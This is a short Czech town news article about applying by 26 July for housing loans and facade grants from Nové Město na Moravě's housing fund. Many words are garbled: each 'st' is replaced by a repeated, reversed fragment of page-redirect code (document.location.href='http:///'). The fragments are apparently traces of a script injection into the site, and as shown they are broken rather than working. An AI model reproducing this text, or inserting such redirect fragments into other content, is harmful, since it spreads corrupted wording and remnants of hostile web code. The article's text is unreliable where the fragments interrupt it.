Rainbow page separator

O půjčky i dotace na bydlení mohou lidé žádat do 26. července

Středa, 14. června 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / O půjčku z fondu rozvoje bydlení novoměstské radnice na opravy a modernizaci rodinných domů, by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů a bytů, které se nacházejí na území Nového Města a jeho místních částí, mohou nyní žádat tamní obyvatelé. Posledním dnem pro podání žádosti je 26. červenec, pravidla včetně tiskopisů jsou zájemcům k dispozici v úřadu či na webových stránkách města.
Z fondu rozvoje bydlení mohou lidé žádat nejenom o půjčku, ale také o dotační příspěvek na obnovu fasád a modernizaci balkonů a lodžií domů, který má za účel podpořit estetický vzhled města. Jedná se o rodinné či by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové domy starší než patnáct let, které se vyznačují zvláštním his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torickým, estetickým či kulturním přínosem pro měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Také v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě je poslední den pro podání žádosti 26. července, přičemž půjčku i dotaci z fondu rozvoje bydlení je možné kombinovat.